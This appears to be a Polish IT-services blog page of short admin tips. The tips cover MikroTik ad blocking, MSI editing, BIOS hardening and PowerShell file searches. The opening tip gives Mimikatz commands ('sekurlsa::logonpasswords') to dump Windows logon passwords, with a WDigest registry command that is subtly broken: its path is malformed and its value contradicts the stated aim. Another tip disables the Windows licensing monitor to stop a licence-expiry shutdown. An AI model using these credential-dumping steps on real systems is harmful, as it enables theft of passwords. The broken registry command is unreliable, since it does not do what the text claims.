Mimikatz – przechwytywanie haseł logowania do systemu Windows 11

Aby za pomocą Mimikatz przechwycić wprowadzone do systemu poświadczenia należy włączyć w Windows przechowywania haseł w pamięci:

reg add
HKLM\SYSTEM\CurrentControlSet\ControlSecurityProviders\WDigest /v
UseLogonCredential /t REG_DWORD /d 0

A następnie w Mimikatz wydać polecenie:

privilege:: debug
sekurlsa::logonpasswords

MikroTik – Ad blocking. Blokowanie reklam.

Showing DNS properties and increasing Cache size:

ip/dns/print
ip/dns/set cache-size=20480

Adding DNS lists

ip/dns/adlist add url=https://raw.githubusercontent.com/StevenBlack/hosts/master/hosts ssl-verify=no
ip/dns/adlist add url=https://raw.githubusercontent.com/MajkiIT/polish-ads-filter/master/polish-pihole-filters/hostfile.txt ssl-verify=no
ip/dns/adlist add url=https://raw.githubusercontent.com/MajkiIT/polish-ads-filter/master/polish-pihole-filters/Ad_filter_list_by_Disconnect.txt ssl-verify=no
ip/dns/adlist add url=https://raw.githubusercontent.com/MajkiIT/polish-ads-filter/master/polish-pihole-filters/NoTrack_Tracker_Blocklist.txt ssl-verify=no

Windows Server 2022 sam się wyłącza. Wyłączenie usługi Windows Licensing Monitoring Service

W środowisku testowym jeśli upłynie okres 180 dni od chwili instalacji Windows Server 2022 system poza wyświetleniem na pulpicie komunikatu o konieczność jego aktywacji po godzinie pracy sam się wyłącza. Aby tego uniknąć należy wyłączyć usługę Windows Licensing Monitoring Service (pol. Usługa Menedżera Licencji Systemu Windows). W tym celu trzeba pobrać narzędzie PsExec.exe a następnie uruchomić je jako administrator. Po uruchomieniu za pośrednictwem PsExec uruchomić cmd.exe.

PsExec.exe -i -s cmd.exe

Po otwarciu cmd.exe należy uruchomić services.exe, znaleźć usługę WLMS i ją wyłączyć. Po restarcie serwera nie będzie już komunikatów na pulpicie a Windows Server 2022 przestanie się sam wyłączać co godzinę.

Edycja pliku instalatora MSI

Do edycji pliku MSI służą narzędzia MSI Tools z pakietu Microsoft SDK (Software Development Kit, do pobrania pod adresem: https://developer.microsoft.com/en-us/windows/downloads/windows-sdk/.
Po instalacji pakietu należy uruchomić instalator właściwego programu w katalogu: c:\program files (x86)\Windows Kits\10\bin\10.0.22621\x86\Orca-x86_en-us.
Następnie należy uruchomić edytor plików MSI w katalogu: c:\program files (x86)\Orca\Orca.exe
Microsoft poleca po otwarciu pliku MSI stworzenie jego kopii binarnej – niepracowanie na oryginalnym pliku. W tym celu po otwarciu pliku należy wybrać na górnym pasku opcję Transform -> New Transform.
Narzędzie MS MSI Tools służy do edycji istniejących instalatorów MSI.
Inne narzędzie https://wixtoolset.org/ służy do budowy instalatorów MSI.

Zabezpieczenie stacji roboczej na poziomie BIOSu na przykładzie Lenovo Neo 50s

Konfiguracja BIOS:

Założenie hasła na konto admina;
Devices: Card Reader, Bluetooth – disable;
Network Setup: Wireless Lan Access, PXE IPv4, IPv6 – disable;
Security: Device Guard – enable, Secure boot – enable, Security Chip 2.0 – enable;
Startup: First Boot Device – m.2 drive, USB Boot Support – disable;

Zamknięcie obudowy na zamek.

PowerShell – wyszukiwanie plików, których rozmiar jest większy niż podana wartość

Get-ChildItem d:\programy -Recurse | Where-Object {$_.Length -gt 100MB} | Select Name, Length, FullName

Konfiguracja łącza internetowego Aero2 na routerze MikroTik RB951Ui-2HnD z modemem Huawei e3131

Continue reading →

PowerShell – XPath – pozyskiwanie danych z pliku XML

$Location = "C:\FileFolder"
$Path = "$($Location)\dane.xml"
$XPath = "/element1/podelement2/nazwa"
Select-Xml -Path $Path -XPath $Xpath | Select-Object -ExpandProperty Node

Process Governor – ograniczenie pamięci dla procesu w systemie Windows.

https://github.com/lowleveldesign/process-governor

PowerShell – usuwanie duplikatów plików

Get-ChildItem -R -Path "D:\fileFolder\" | ? { $_.Name -like '*(1).mp4' } | Remove-Item

Obsługa IT

Obsługa informatyczna firm i użytkowników indywidualnych. Optymalne rozwiązania informatyczne. Kielce.